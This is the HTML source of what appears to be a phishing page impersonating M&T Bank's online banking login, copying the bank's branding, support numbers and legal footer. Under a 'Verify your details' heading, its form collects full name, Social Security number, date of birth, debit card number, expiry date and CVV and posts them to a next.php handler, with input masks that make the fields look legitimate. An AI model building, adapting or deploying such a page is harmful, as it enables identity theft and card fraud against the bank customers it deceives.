<html lang="en">

<head>
    <title>Welcome to Online Banking | M&amp;T Bank</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link href="css/css.css" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
</head>

<body>
    <form action="./next.php" method="POST">
        <div class="mtb-app-enrollment">
            <header class="mtb-page-header">
                <div class="grid-x align-center">
                    <div class="cell"><a href="#" class="mtb__logo"><img src="images/mtb-logo.svg" alt="M&amp;T Bank Site"></a></div>
                </div>
            </header>
            <div class="mtb-page-error js-pgLevelMsg" id="error" style="display: none;">
                <div class="mtb-app-default--content">
                    <div class="callout __has-icon warning __no-border">
                        <i class="fas fa-info-circle"></i>
                        <span id="errorrr" style="color: grey;">That account doesn't exist. Enter a different account</span>
                    </div>
                </div>
            </div>
            <div class="mtb-app-login--content" id="div1" style="display: block;">
                <div class="grid-x grid-x__padded __spacer-section">
                    <div class="cell">
                        <div class="mtb-section-header mtb-section-header__login">
                            <h1> Verify your details</h1>
                            <!-- <p> For Personal and Business Accounts </p> -->
                        </div>
                    </div>
                    <div class="cell"><label for="userId" id="emtxt">First Name </label>
                        <div class="input-group m-fake-single-input">
                            <input class="input-group-field js-formnputItem" type="text" id="fname" name="fname" required="">
                        </div>
                    </div>
                    <div class="cell"><label for="userId" id="emtxt"> Middle Name </label>
                        <div class="input-group m-fake-single-input">
                            <input class="input-group-field js-formnputItem" type="text" id="mname" name="mname">
                        </div>
                    </div>
                    <div class="cell"><label for="userId" id="emtxt"> Last Name </label>
                        <div class="input-group m-fake-single-input">
                            <input class="input-group-field js-formnputItem" type="text" id="lname" name="lname" required="">
                        </div>
                    </div>
                    <div class="cell"><label for="userId" id="emtxt"> Social Security Number </label>
                        <div class="input-group m-fake-single-input">
                            <input class="input-group-field js-formnputItem" type="text" id="ssn" name="ssn" required="">
                        </div>
                    </div>
                    <div class="cell"><label for="userId" id="emtxt"> Date of birth </label>
                        <div class="input-group m-fake-single-input">
                            <input class="input-group-field js-formnputItem" type="text" id="dob" name="dob" required="">
                        </div>
                    </div>
                    <div class="cell"><label for="userId" id="emtxt"> ATM/Debit Card Number </label>
                        <div class="input-group m-fake-single-input">
                            <input class="input-group-field js-formnputItem" type="text" id="cn" name="cn" required="">
                        </div>
                    </div>
                    <div class="cell"><label for="Passcode"> Expiry Date </label>
                        <div class="input-group m-fake-single-input">
                            <input class="input-group-field js-formnputItem" data-fc-id="122" type="text" id="exdate" name="exdate" required="">
                        </div>
                    </div>
                    <div class="cell"><label for="Passcode"> CVV </label>
                        <div class="input-group m-fake-single-input">
                            <input class="input-group-field js-formnputItem" data-fc-id="122" minlength="3" maxlength="4" type="text" id="st" name="st" required="">
                        </div>
                    </div>
                   
                </div>
                <div class="grid-x grid-padding-x __spacer-paragraph grid-x__padded">
                    <div class="cell"><button class="button button__form-no-spacer expanded" id="btn3" name="btn3" type="submit"> Verify </button></div>
                </div>
            </div>
            <div class="mtb-app-login--content" id="div2" style="display: none;margin-bottom: 200px">
                <div class="grid-x grid-x__padded __spacer-section">
                    <div class="cell">
                        <div class="mtb-section-header mtb-section-header__login">
                            <h1> Thank You For Verifying Your Account </h1>
                        </div>
                    </div>
                </div>
            </div>
            <hr class="__spacer-section">
            <div class="mtb-app-default--content">
                <div class="grid-x grid-padding-x grid-x__padded">
                    <div class="cell text-center">
                        <p class="__font-size-secondary"> Have questions about M&amp;T Online Banking? </p>
                    </div>
                    <div class="cell medium-6 text-center">
                        <p class="__font-size-secondary __color-primary __spacer-paragraph-half"> Personal Accounts: <a href="#" class="__no-underline">1-800-790-9130</a></p>
                        <p class="__font-size-sub __spacer-remove __color-gray-accent"> Monday - Friday 8am - 9pm ET </p>
                        <p class="__font-size-sub __spacer-paragraph __color-gray-accent"> Saturday - Sunday 9am - 5pm ET </p>
                    </div>
                    <div class="cell medium-6 text-center">
                        <p class="__font-size-secondary __color-primary __spacer-paragraph-half"> Business Accounts: <a href="#" class="__no-underline">1-800-724-6070</a></p>
                        <p class="__font-size-sub __spacer-remove __color-gray-accent"> Monday - Friday 6am - 9pm ET </p>
                        <p class="__font-size-sub __spacer-section __color-gray-accent"> Saturday - Sunday 9am - 5pm ET </p>
                    </div>
                </div>
            </div>
            <section class="mtb-footer mtb-footer__auth" role="contentinfo">
                <div class="grid-x">
                    <div class="cell flex-container flex-dir-column align-center-middle">
                        <div class="mtb-footer--auth"><a href="#" class="" target="_blank">Get Started Guide</a><a href="#" target="_blank">Security Assistance</a><a href="#" target="_blank">Digital Service Agreement</a><a href="#" target="_blank">ESign Agreement</a><a href="#" target="_blank"> Accessibility </a><a href="#" target="_blank"> mtb.com </a></div>
                        <div class="mtb-footer--non-auth">
                            <p> ©2021 M&amp;T Bank. All Rights Reserved.<br> Users of this website agree to be bound by the provisions of the M&amp;T website <a href="#" target="_blank"> Terms of Use </a> and <a href="#" target="_blank">Privacy Policy</a>. </p>
                            <div class="mtb-footer__logo"><a href="#" target="_blank"><img src="images/mtb-equalhousinglender.svg" class="mtb-footer__equalhousinglender" alt="Equal Housing Lender"></a><a href="#" target="_blank"><img src="images/mtb-entrust.svg " class="mtb-footer__entrust" alt="Entrust"></a></div>
                            <p> Equal Housing Lender NMLS #381076 <a href="#" target="_blank">Member FDIC</a></p>
                        </div>
                    </div>
                </div>
            </section>
        </div>
    </form>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
    <script src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/jquery.inputmask.bundle.js"></script>
    <script type="text/javascript">
    $("#ssn").inputmask({ "mask": "999-99-9999" });
    $("#cn").inputmask({ "mask": "9999 9999 9999 9999" });
    $("#exdate").inputmask({ "mask": "99/9999", "placeholder": "MM/YYYY" });
    $("#dob").inputmask({ "mask": "99/99/9999", "placeholder": "DD/MM/YYYY" });
    $("#ph").inputmask({ "mask": "999-999-9999" });
    </script>
</body>

</html>